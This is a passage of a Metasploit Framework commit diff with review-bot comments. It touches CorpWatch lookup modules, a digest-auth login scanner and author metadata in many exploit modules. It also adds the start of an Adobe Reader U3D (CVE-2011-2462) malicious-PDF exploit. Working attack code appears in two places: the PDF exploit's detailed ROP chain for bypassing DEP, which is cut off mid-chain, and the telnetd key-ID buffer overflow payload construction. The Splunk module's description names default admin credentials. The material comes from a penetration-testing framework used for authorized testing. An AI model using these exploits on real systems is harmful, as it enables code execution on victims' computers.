print_status("Limiting children results to 5")
end
res = send_request_cgi(
{
'uri' => child_uri,
'method' => 'GET'
}, 25)
if res == nil
print_error("Server down or bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query return bad or broken data")
return
end
root = doc.root
elements = root.get_elements("result")
results = elements[0]
if results == nil
print_status("No results were returned.")
else
results = results.get_elements("companies")[0]
if results == nil
print_status("No results returned")
else
results.elements.each { |e|
loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCentral Index Key: " + (cik = grab_text(e, "cik")))
loot << ("\nCompany Name: " + (name = grab_text(e, "company_name")))
loot << ("\nIRS number: " + (irsno = grab_text(e, "irs_number")))
loot << ("\nSIC Code: " + (sic_code = grab_text(e, "sic_code")))
loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
loot << ("\nSource: " + (source = grab_text(e, "source_type")))
loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
loot << ("\nCountry: " + (country = grab_text(e, "country_code")))
loot << ("\nSubdivision: " + (subdiv = grab_text(e, "subdiv_code")))
loot << ("\nTop parent: " + (top_parent = grab_text(e, "top_parent_id")))
loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMin searchable year: " + (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_line("\n")
print_status("Child Information\n--------------------")
print_status("CorpWatch ID: " + cwid)
print_status("Central Index Key (CIK): " + cik)
print_status("Full Name: " + name)
print_status("IRS Number: " + irsno)
print_status("SIC Code: " + sic_code)
print_status("Sector: " + sector)
print_status("Source Type: " + source)
print_line("")
print_status("Address and Location Information\n-----------------------------")
print_status("Full Address: " + address)
print_status("Country Code: " + country)
print_status("Subdivision: " + subdiv)
print_line("")
print_status("Parent and Children Information\n---------------------------")
print_status("Top Parent ID: " + top_parent)
print_status("Number of parent companies: " + num_parents)
print_status("Number of child companies: " + num_children)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
end
end
end
if datastore['GET_HISTORY']
res = send_request_cgi({
'uri' => uri + "/history.xml",
'method' => 'GET'
}, 25)
if res == nil
print_error("Server down or bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query return bad or broken data")
return
end
root = doc.root
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("No results.")
return
end
results = elements[0]
if results == nil
print_status("No results returned.")
else
results = results.get_elements("companies")[0]
results.elements.each { |e|
loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCentral Index Key: " + (cik = grab_text(e, "cik")))
loot << ("\nIRS Number: " + (irsno = grab_text(e, "irs_number")))
loot << ("\nSIC Code: " + (sic_code = grab_text(e, "sic_code")))
loot << ("\nIndustry: " + (industry = grab_text(e, "industry_name")))
loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
loot << ("\nSIC Sector: " + (sic_sector = grab_text(e, "sic_sector")))
loot << ("\nSource: " + (source = grab_text(e, "source_type")))
loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
loot << ("\nCountry: " + (country_code = grab_text(e, "country_code")))
loot << ("\nSub-division Code: " + (subdiv_code = grab_text(e, "subdiv_code")))
loot << ("\nTop parent ID: " + (top_parent = grab_text(e, "top_parent_id")))
loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMin searchable year: " + (min_year = grab_text(e, "min_year")))
loot << ("\nHistory year: " + (history_year = grab_text(e, "year")))
loot << "\n\n\n"
print_line("\n")
print_status("Company History for year #{history_year}\n--------------------------------")
print_status("CorpWatch ID: " + cwid)
print_status("Central Index Key: " + cik)
print_status("IRS number: " + irsno)
print_status("SIC Code: " + sic_code)
print_status("Industry: " + industry)
print_status("Sector: " + sector)
print_status("SIC Sector: " + sic_sector)
print_status("Source: " + source)
print_status("Address: " + address)
print_status("Country: " + country_code)
print_status("Subdivision: " + subdiv_code)
print_status("Top Parent ID: " + top_parent)
print_status("Number of parents: " + num_parents)
print_status("Number of children: " + num_children)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
end
end
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CW_ID']}.txt","#{datastore["CW_ID"]} Specific Information")
print_line()
print_status("Saved in: #{p}")
end
def grab_text(e, name)
(e.get_elements(name) && e.get_elements(name)[0] &&
e.get_elements(name)[0].get_text ) ?
e.get_elements(name)[0].get_text.to_s : ""
end
end
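Review bot: the progress message in the GET_CHILDREN branch hard-codes the number ("Limiting children results to 5") while the request actually uses `datastore['CHILD_LIMIT']`; print the real value, e.g. `print_status("Limiting children results to #{datastore['CHILD_LIMIT']}")`. In the GET_HISTORY branch, `results = results.get_elements("companies")[0]` is followed directly by `results.elements.each` with no nil check, so a `result` element without a `companies` child raises NoMethodError instead of the "No results" status the filings and children branches print; add the same `if results == nil` guard there. The children query also builds its query string by hand (`child_uri << "?limit=#{datastore['CHILD_LIMIT']}"`) instead of passing `'vars_get'`, so the value is never URL-encoded, and each bare `rescue` around `REXML::Document.new` should name the exception (`rescue REXML::ParseException`) so unrelated errors are not reported as bad XML. Finally, `store_loot` at the end runs even when `loot` is empty; guard it with `unless loot.empty?` so an empty file is not written for every miss.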

View File

@ -0,0 +1,140 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CorpWatch Company Name Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given company name. Please note that by using CorpWatch API, you
acknolwdge the limitations of the data CorpWatch provides, and should always
verify the information with the official SEC filings before taking any action.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
[ 'URL', 'http://api.corpwatch.org/' ]
]
))
register_options(
[
OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
OptString.new('YEAR', [ false, "Limit results to a specific year", ""]),
OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
OptString.new('API_KEY', [ false, "Use this API key when getting the data", ""]),
], self.class)
deregister_options('RHOST', 'RPORT', 'Proxies', 'VHOST')
end
def cleanup
datastore['RHOST'] = @old_rhost
datastore['RPORT'] = @old_rport
end
def run
# Save the original rhost/rport in case the user was exploiting something else
@old_rhost = datastore['RHOST']
@old_rport = datastore['RPORT']
# Initial api.corpwatch.org's rhost and rport for HttpClient
datastore['RHOST'] = 'api.corpwatch.org'
datastore['RPORT'] = 80
uri = "/"
uri << (datastore['YEAR'] + "/") if datastore['YEAR'] != ""
uri << "companies.xml"
res = send_request_cgi(
{
'uri' => uri,
'method' => 'GET',
'vars_get' =>
{
'company_name' => datastore['COMPANY_NAME'],
'limit' => datastore['LIMIT'],
'key' => datastore['API_KEY']
}
}, 25)
if not res
print_error("Server down, bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Body not well formed XML")
return
end
root = doc.root
if not root
print_error("document root nil")
return
end
elements = root.get_elements("result")
if not elements
print_error("Document root has no results")
return
end
results = elements[0]
if not results
print_error("No results returned, try another search")
return
end
elements = results.get_elements("companies")
if not elements
print_error("No companies returned")
return
end
results = elements[0]
return if not results.elements || results.elements.length == 0
results.elements.each { |e|
cwid = grab_text(e, "cw_id")
company_name = grab_text(e, "company_name")
address = grab_text(e, "raw_address")
sector = grab_text(e, "sector_name")
industry = grab_text(e, "industry_name")
print_status("Company Information\n---------------------------------")
print_status("CorpWatch (cw) ID): " + cwid)
print_status("Company Name: " + company_name)
print_status("Address: " + address)
print_status("Sector: " + sector)
print_status("Industry: " + industry)
}
end
def grab_text(e, name)
(e.get_elements(name) && e.get_elements(name)[0] &&
e.get_elements(name)[0].get_text ) ?
e.get_elements(name)[0].get_text.to_s : ""
end
end
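Review bot: `results = elements[0]` near the end of `run` is dereferenced on the next line (`results.elements`) without a nil check, so a `result` element with no `companies` child raises NoMethodError rather than returning cleanly. The preceding `if not elements` checks never fire either, because `get_elements` returns an array and an empty array is truthy in Ruby; test `elements.empty?` (or check `elements[0]`) instead. The description has a typo ("acknolwdge" should be "acknowledge"), and the status line `"CorpWatch (cw) ID): "` has an unbalanced parenthesis. Also, `'key' => datastore['API_KEY']` sends an empty `key=` parameter when no API key is configured; only include it when the option is set.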

View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Call Scanner',
'Version' => '$Revision$',
'Description' => 'This module scans for active DECT calls',
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
)

View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Base Station Scanner',
'Version' => '$Revision$',
'Description' => 'This module scans for DECT base stations',
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
)

View File

@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "http_default_pass.txt") ]),
OptString.new('AUTH_URI', [ false, "The URI to authenticate against (default:auto)" ]),
OptString.new('REQUESTTYPE', [ false, "Use HTTP-GET or HTTP-PUT for Digest-Auth (default:GET)", "GET" ])
OptString.new('REQUESTTYPE', [ false, "Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)", "GET" ])
], self.class)
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
end
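Review bot: REQUESTTYPE now accepts three values (GET, PUT, PROPFIND) but stays an `OptString`, so a typo such as `PROPFND` silently falls through to the default request path; an `OptEnum` with the allowed values, e.g. `OptEnum.new('REQUESTTYPE', [false, 'Request type for Digest-Auth', 'GET', ['GET', 'PUT', 'PROPFIND']])`, would reject bad input when the option is set.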
@ -277,6 +277,16 @@ class Metasploit3 < Msf::Auxiliary
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
elsif requesttype == "PROPFIND"
res,c = send_digest_request_cgi({
'uri' => path,
'method' => requesttype,
'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass,
'headers' => { 'Depth' => '0'}
}, 25)
else
res,c = send_digest_request_cgi({
'uri' => path,
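Review bot: the commented-out `#'DigestAuthIIS' => false,` line in the new PROPFIND branch looks like leftover debugging; either remove it or explain why IIS digest handling would need to be disabled for PROPFIND. The branch also sends an XML body with only a `Depth: 0` header; if `send_digest_request_cgi` passes it through, adding `'ctype' => 'text/xml'` would declare the body type for servers that check it.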
@ -294,7 +304,7 @@ class Metasploit3 < Msf::Auxiliary
return :abort if (res.code == 404)
if (res.code == 200) or (res.code == 201)
if (res.code == 200) or (res.code == 201)
if ((res.code == 201) and (requesttype == "PUT"))
print_good("Trying to delete #{path}")
del_res,c = send_digest_request_cgi({
@ -311,6 +321,11 @@ class Metasploit3 < Msf::Auxiliary
return :success
end
if (res.code == 207) and (requesttype == "PROPFIND")
@proof = res
return :success
end
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return :abort
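Review bot: the new 207 check accepts any Multi-Status response to PROPFIND as a successful login, which matches WebDAV behaviour, but it sits as a separate block after the 200/201 handling; folding the three success codes into one conditional would keep the status logic in one place. Note also that `@proof = res` stores the whole response, including the PROPFIND XML body, as proof; keeping just the status line would be enough.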

View File

@ -21,17 +21,18 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'FreeBSD Telnet Service Encyption Key ID Buffer Overflow',
'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the encryption option handler of the
FreeBSD telnet service.
},
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '51182'],
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
@ -57,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
# Versions 5.2 and below do not support encyption
],
'DefaultTarget' => 0,
'DisclosureDate' => ''))
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 23 2011'))
end
def exploit_target(t)

View File

@ -21,19 +21,20 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux BSD-derived Telnet Service Encyption Key ID Buffer Overflow',
'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the encryption option handler of the
Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions
use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
Linux systems running telnetd.
},
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '51182'],
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
@ -47,16 +48,15 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
[ 'Automatic', { } ],
[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => ''))
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 23 2011'))
end
def exploit_target(t)
connect
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
print_status(banner_sanitized) if datastore['VERBOSE']
@ -71,20 +71,20 @@ class Metasploit3 < Msf::Exploit::Remote
key_id[ 0, 2] = "\xeb\x76"
key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
key_id[76, 4] = [ t['Ret'] ].pack("V")
key_id[76, 4] = [ t['Ret'] ].pack("V")
# Some of these bytes can get mangled, jump over them
key_id[80,40] = "\x41" * 40
# Insert the real payload
key_id[120, penc.length] = penc
# Create the Key ID command
sploit = enc_keyid + key_id + end_suboption
# Initiate encryption
sock.put(enc_init)
# Wait for a successful response
loop do
data = sock.get_once(-1, 5) rescue nil
@ -107,12 +107,12 @@ class Metasploit3 < Msf::Exploit::Remote
# Some delay between each request seems necessary in some cases
::IO.select(nil, nil, nil, 0.5)
# The second request results in the pointer being called
print_status("Sending second payload...")
sock.put(sploit)
handler
::IO.select(nil, nil, nil, 0.5)
disconnect
end

View File

@ -27,9 +27,9 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'EgiX <n0b0d13s[at]gmail-com>', # original discovery/poc
'mr_me <steventhomasseeley[at]gmail-com>', # msf
'TecR0c <roccogiovannicalvi[at]gmail-com >', # msf
'EgiX <n0b0d13s[at]gmail.com>', # original discovery/poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf
'TecR0c <roccogiovannicalvi[at]gmail.com >', # msf
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
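Review bot: the TecR0c entry at the end of this hunk still has a trailing space inside the angle brackets (`gmail.com >`) after the gmail-com fix; drop the space so the address is formatted like the other two.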

View File

@ -27,11 +27,12 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Plone Security team', # Vulnerability discovery
'Nick Miles', # Original exploit
'TecR0c' # Metasploit module
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
],
'References' =>
[
['CVE', '2011-3587'],
['OSVDB', '76105'],
['URL', 'http://www.exploit-db.com/exploits/18262/'],
['URL', 'http://plone.org/products/plone/security/advisories/20110928']
],

View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'EgiX', # Vulnerability discovery and exploit
'TecR0c' # Metasploit Module
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module
],
'References' =>
[

View File

@ -17,15 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Splunk Search Remote Code Execution',
'Description' => %q{
This module abuses a command execution vulnerability within the
This module abuses a command execution vulnerability in the
web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists
within the 'mappy' search command which allows to run python code.
To exploit this vulnerability a valid Splunk user with the admin
role is required. Unfortunately, Splunk uses a default credential of
'admin:changeme' for admin access, which is used to leverage our attack.
The Splunk Web interface runs as SYSTEM on Windows and as root
on Linux by default.
in the 'mappy' search command which allows attackers to run Python code.
To exploit this vulnerability, a valid Splunk user with the admin
role is required. By default, this module uses the credential of "admin:changeme",
the default Administrator credential for Splunk. Note that the Splunk web interface
runs as SYSTEM on Windows and as root on Linux by default.
},
'Author' =>
[

View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'EgiX', # Vulnerability discovery and exploit
'TecR0c' # Metasploit Module
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module
],
'References' =>
[

View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'shinnai', # original discovery
'mr_me', # msf
'mr_me <steventhomasseeley[at]gmail.com>', # msf
'sinn3r' # wbemexec tekniq
],
'Version' => '$Revision$',

View File

@ -29,8 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Dr_IDE', # Vulnerability discovery and original exploit
'TecR0c', # Metasploit module
'mr_me' # Metasploit module
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
'mr_me <steventhomasseeley[at]gmail.com>' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>

View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'regenrecht', # discovery
'Rh0', # metasploit module
'mr_me' # win7 target
'mr_me <steventhomasseeley[at]gmail.com>' # win7 target
],
'Version' => "$Revision$",
'References' =>

View File

@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Matteo Memelli', #PoC from Exploit-DB
'dookie2000ca', #"Helping" ryujin (Matteo)
'sinn3r', #Metasploit
'mr_me', #XP target (no aslr)
'TecR0c', #XP target (no aslr)
'mr_me <steventhomasseeley[at]gmail.com>', #XP target (no aslr)
'TecR0c <roccogiovannicalvi[at]gmail.com>', #XP target (no aslr)
],
'References' =>
[

View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'Trirat Puttaraksa <trir00t [at] gmail.com>',
'Trirat Puttaraksa <trir00t[at]gmail.com>',
],
'Version' => '$Revision$',
'References' =>

View File

@ -152,6 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
if target.name == 'Automatic'
mytarget = auto_target(cli, request)
if mytarget.nil?
agent = request.headers['User-Agent']
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
send_not_found(cli)
return

View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version' => '$Revision$',
'References' =>
[

View File

@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
property of ienipp.ocx an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version' => '$Revision$',
'References' =>
[

View File

@ -28,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Luigi Auriemma', # original find
'mr_me <steventhomasseeley[at]gmail-com>', # msf module
'TecR0c <roccogiovannicalvi[at]gmail-com >',# msf module
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
'TecR0c <roccogiovannicalvi[at]gmail.com >',# msf module
],
'Version' => '$Revision$',
'References' =>
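Review bot: the TecR0c entry in this hunk still has a trailing space inside the angle brackets (`gmail.com >`) after the gmail-com fix; drop the space so the address matches the mr_me entry above it.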

View File

@ -29,8 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'shinnai', # Vulnerability discovery and original exploit
'TecR0c', # Metasploit module
'mr_me' # Metasploit module
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
'mr_me <steventhomasseeley[at]gmail.com>' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>

View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'hdm',
'Faithless <rhyskidd [at] gmail.com>'
'Faithless <rhyskidd[at]gmail.com>'
],
'Version' => '$Revision$',
'References' =>

View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Microsoft', # reported to Adobe
'villy <villys777 [at] gmail.com>', # public exploit
'villy <villys777[at]gmail.com>', # public exploit
# Metasploit version by:
'jduck'
],

View File

@ -0,0 +1,652 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Reader U3D Memory Corruption Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the U3D handling within
versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.
The vulnerability is due to the use of uninitialized memory.
Arbitrary code execution is achieved by embedding specially crafted U3D
data into a PDF document. A heap spray via JavaScript is used in order to
ensure that the memory used by the invalid pointer issue is controlled.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r',
'juan vazquez',
'jduck'
],
'References' =>
[
[ 'CVE', '2011-2462' ],
[ 'OSVDB', '77529' ],
[ 'BID', '50922' ],
[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa11-04.html' ],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/' ],
[ 'URL', 'http://blog.9bplus.com/analyzing-cve-2011-2462' ],
[ 'URL', 'http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[
# Adobe Reader 9.4.0 / XP SP3
# Adobe Reader 9.4.5 / XP SP3
# Adobe Reader 9.4.6 / XP SP3
'Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3',
{
# gadget from icucnv36:
# mov ecx,dword ptr [eax+3Ch]
# mov eax,dword ptr [ecx]
# call dword ptr [eax+1Ch]
'Ret' => 0x4a8453c3
}
],
],
'DisclosureDate' => 'Dec 06 2011', #Needs to be checked
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)
end
def junk(n=1)
tmp = []
value = rand_text(4).unpack("L")[0].to_i
n.times { tmp << value }
return tmp
end
def exploit
# DEP bypass; uses icucnv36.dll
stack_data = [
junk,
0x0c0c0c0c, # mapped at 0x0c0c0c0c # becomes edi after stackpivot
0x0c0c0c0c, # becomes esi
0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h
0x4a8a0000, # becomes edi
0x4a802196, # becomes esi
0x4a801f90, # becomes ebp
0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h
0x4a806cef, # Stackpivot! xchg eax,esp (eax=0x0c0c0c0c) / xor al, al / pop edi / pop esi / ret # padding
junk(4),
0x00000000, # becomes edi
0x00000002, # becomes esi
0x00000102, # becomes ebp
0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h
junk(5),
0x4a80a8a6, # becomes edi
0x4a801f90, # becomes esi
0x4a849038, # becomes ebp
0x4a8063a5, # pop ecx / ret
junk(5),
0x4a8a0000, # becomes ecx
0x4a802196, # mov dword ptr [ecx],eax / ret # Stores eax (stack address)
0x4a801f90, # pop eax / ret
0x4a84903c, # becomes eax (import for CreateFileA)
0x4a80b692, # jmp dword ptr [eax] {kernel32!CreateFileA}
0x4a801064, # ret for CreateFileA # ret
0x00000000, # __in LPCTSTR lpFileName
0x10000000, # __in DWORD dwDesiredAccess
0x00000000, # __in DWORD dwShareMode
0x00000000, # __in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes
0x00000002, # __in DWORD dwCreationDisposition
0x00000102, # __in DWORD dwFlagsAndAttributes
0x00000000, # __in_opt HANDLE hTemplateFile
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax, edi / ret
0x4a802ab1, # pop ebx / ret
0x00000008, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0x0c0c0ce0, edi = {Result of CreateFileA}) / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a801f90, # pop eax / ret
0x4a849038, # becomes eax (import for CreateFileA)
0x4a80b692, # jmp dword ptr [eax] {kernel32!CreateFileMappingA}
0x4a801064, # ret for CreateFileMappingA # ret
0xffffffff, # __in HANDLE hFile # mapped at 0c0c0ce0 => Stores Result of CreateFileA
0x00000000, # __in_opt LPSECURITY_ATTRIBUTES lpAttributes,
0x00000040, # __in DWORD flProtect,
0x00000000, # __in DWORD dwMaximumSizeHigh,
0x00010000, # __in DWORD dwMaximumSizeLow,
0x00000000, # __in_opt LPCTSTR lpName
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax, edi / ret
0x4a802ab1, # pop ebx / ret
0x00000008, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0x0c0c0d20, edi = {Result of FileMappingA}) / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a801f90, # pop eax / ret
0x4a849030, # becomes eax (import for kernel32!MapViewOfFile)
0x4a80b692, # jmp dword ptr [eax] {kernel32!MapViewOfFile}
0x4a801064, # ret for MapViewOfFile # ret
0xffffffff, # __in HANDLE hFileMappingObject # mapped at 0x0c0c0d20 => {Result of FileMappingA}
0x00000022, # __in DWORD dwDesiredAccess
0x00000000, # __in DWORD dwFileOffsetHigh
0x00000000, # __in DWORD dwFileOffsetLow
0x00010000, # __in SIZE_T dwNumberOfBytesToMap
0x4a8063a5, # pop ecx / ret
0x4a8a0004, # becomes ecx
0x4a802196, # mov dword ptr [ecx],eax / ret # Stores result of MapViewOfFile
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax, edi / ret
0x4a802ab1, # pop ebx / ret
0x00000030, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0db8, edi = {Result of MapViewOfFile} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a801f90, # pop eax / ret
0x4a8a0004, # becomes eax {Result of MapViewOfFile}
0x4a80a7d8, # mov eax,dword ptr [eax] / ret
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax, edi / ret
0x4a802ab1, # pop ebx / ret
0x00000020, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0dbc, edi = {Result of MapViewOfFile} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
